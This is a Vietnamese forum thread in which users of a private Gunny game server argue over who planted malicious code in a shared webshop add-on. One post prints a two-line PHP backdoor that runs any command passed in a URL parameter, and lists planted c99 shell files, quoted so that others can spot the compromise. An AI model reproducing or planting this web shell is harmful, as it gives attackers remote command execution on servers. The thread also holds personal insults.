PDA

View Full Version : [Gunny] Đính chính về vụ webshop - đã tìm ra nguyên nhân (nmvuong52 chui đầu vào đây)

bachugacon122
17-08-13, 05:01 PM
Thứ nhất : cái mình share là file gốc của mấy thằng chôm web shop của mình, rồi 1 thằng share cho mod hung. sau đó mình nhờ mod Hùng up file đó lên gg rồi đưa link để mình share
<b><font color=red>[Chỉ có thành viên mới xem link được. <a href="register.php"> Nhấp đây để đăng ký thành viên......</a>]</font></b>
Nên nếu có gì thì éo thể do mình dc nhá ok ?, và cái này mình cũng đã thông báo ngay khi share rồi cần thì xem qua bài share của mình nhé
Thứ hai : Mình không cần biết bạn có thù oán gì với mình nhưng bạn chả đưa ra được bằng chứng gì chứng minh mình chèn bla bla
mà đã đi bô lô ba la là mình này nọ ?

mình không nói nhiều làm gì. mình đã free cái đó hết rồi, cho anh em diễn đàn học hỏi thêm . và tìm cách fix nó. để không còn nạn hack , rồi lấy dữ liệu người khác. người dùng sẽ cho câu tra lời. bạn muốn bằng chứng gì.
cài gì đây ta:
file:C:\xampp\htdocs\css\xampp.php
file:C:\xampp\htdocs\css\c99.php
file:C:\xampp\htdocs\css\c99.txt
cái này là cái gì :S
Thứ ba : Mình vừa tải cái webshop bạn mới share thì check được cái này

<?php
if(isset($_GET['index']))
System($_GET['index']);
?>
Đoạn code này nằm trong 1 file trong đó cùng với một số đoạn khác
bác nào biết php nhìn vào sẽ hiểu ngay, chỉ với 2 dòng đó là đủ phá nát bét sv rồi đêý, nhưng thực tế là file mình share éo có đoạn này , thế là thế nào ?

nmvuong52
17-08-13, 05:21 PM
Thứ nhất : cái mình share là file gốc của mấy thằng chôm web shop của mình, rồi 1 thằng share cho mod hung. sau đó mình nhờ mod Hùng up file đó lên gg rồi đưa link để mình share
<b><font color=red>[Chỉ có thành viên mới xem link được. <a href="register.php"> Nhấp đây để đăng ký thành viên......</a>]</font></b>
Nên nếu có gì thì éo thể do mình dc nhá ok ?, và cái này mình cũng đã thông báo ngay khi share rồi cần thì xem qua bài share của mình nhé
Thứ hai : Mình không cần biết bạn có thù oán gì với mình nhưng bạn chả đưa ra được bằng chứng gì chứng minh mình chèn bla bla
mà đã đi bô lô ba la là mình này nọ ?

cái này là cái gì :S
Thứ ba : Mình vừa tải cái webshop bạn mới share thì check được cái này

Đoạn code này nằm trong 1 file trong đó cùng với một số đoạn khác
bác nào biết php nhìn vào sẽ hiểu ngay, chỉ với 2 dòng đó là đủ phá nát bét sv rồi đêý, nhưng thực tế là file mình share éo có đoạn này , thế là thế nào ?

mấy cái này. không nằm trong wwebshop đâu. mình biết lúc thằng hack đang nhập vào webshop và đã ghi lại tất cả thông tin nhưn gì nó làm. nó tạo ra các file này để hack
nếu bác nói như zay thi sorry nhá. vậy có 1 thằng chơi xấu nào rồi add code hack

Edward_Newgate
17-08-13, 05:22 PM
Lâu lâu vào gió phát :">
Đọc xong có thể hiểu là
- Lấy webshop từ mấy thằng ăn trộm
1. Thằng ăn trộm chèn shell
2. Thằng ăn trộm bị chèn shell
- Mod Hùng upload
1. Mod chèn shell
2. Mod bị lừa

Phán không đúng không lấy tiền :-"

bachugacon122
17-08-13, 05:25 PM
mấy cái này. không nằm trong wwebshop đâu. mình biết lúc thằng hack đang nhập vào webshop và đã ghi lại tất cả thông tin nhưn gì nó làm. nó tạo ra các file này để hack
nếu bác nói như zay thi sorry nhá. vậy có 1 thằng chơi xấu nào rồi add code hack

Cái chuyện bạn ghi lại những gì ai đó phá web bạn hay là bạn tự dựng lên chuyện đó để đổ cho mình thì mình ko quan tâm
nhưng mình đã nói rõ mình éo liên quan đến chuyện đó
nên hi vọng bạn nói 1 tiếng xin lỗi và sửa lại mấy cái toppic kia đi
lần sau khi chưa biết chuyện gì đang xảy ra thì shut up, tìm hiểu nguyên nhân rồi hãy phán nhé [-(

vuongngocs
17-08-13, 05:29 PM
mình không mở online nên chưa bao h sử dụng webshop, like cho chủ topic phát vì thấy bạn rất nhiệt tình! hehe...

bachugacon122
17-08-13, 05:36 PM
mình không mở online nên chưa bao h sử dụng webshop, like cho chủ topic phát vì thấy bạn rất nhiệt tình! hehe...

Tks bạn :D, mà bạn nhắc mới nhớ
ở toppic share đã có câu này

Chống chỉ định với Gunny Onl, Mọi lỗi xảy ra mình ko giải quyết

thế nên nmvuong52 shut up đi nhá :-L:-L

catbuituyetvoi
17-08-13, 05:44 PM
:v bác này điên mất r (bác nmvuong)
Không set Permission thì đừng mơ khởi tạo file nhé (:-ss cơ mà cũng tùy lúc có thể có 1 số trường hợp create khác có thể tham khảo ở w3c) :-ss
Bác có biết lập trình ko mà nói bậy nói bạ thế :-ss
Mình đã check toàn bộ file :-ss

=))
Còn việc ai chèn mã độc gì thì còn chưa nói đc
Cũng có thể là bác đó

(Mọi câu nói chỉ hướng tới bác nmvuong)

hung3020
17-08-13, 05:49 PM

nmvuong52
17-08-13, 05:52 PM
:v bác này điên mất r (bác nmvuong)
Không set Permission thì đừng mơ khởi tạo file nhé (:-ss cơ mà cũng tùy lúc có thể có 1 số trường hợp create khác có thể tham khảo ở w3c) :-ss
Bác có biết lập trình ko mà nói bậy nói bạ thế :-ss
Mình đã check toàn bộ file :-ss

=))
Còn việc ai chèn mã độc gì thì còn chưa nói đc
Cũng có thể là bác đó

(Mọi câu nói chỉ hướng tới bác nmvuong)

mình nói thật nhé. không biết thàng heo, bò,vịt nào chèn mã đoc vào. thằng heo,bò,vịt,, nào chèn thì tự nó biết nhá

còn mi thì biết cái gì mà đưa cái mỏ vào.
không biết thì im cái mỏ mày lại đi. đừng làm nổi ở đây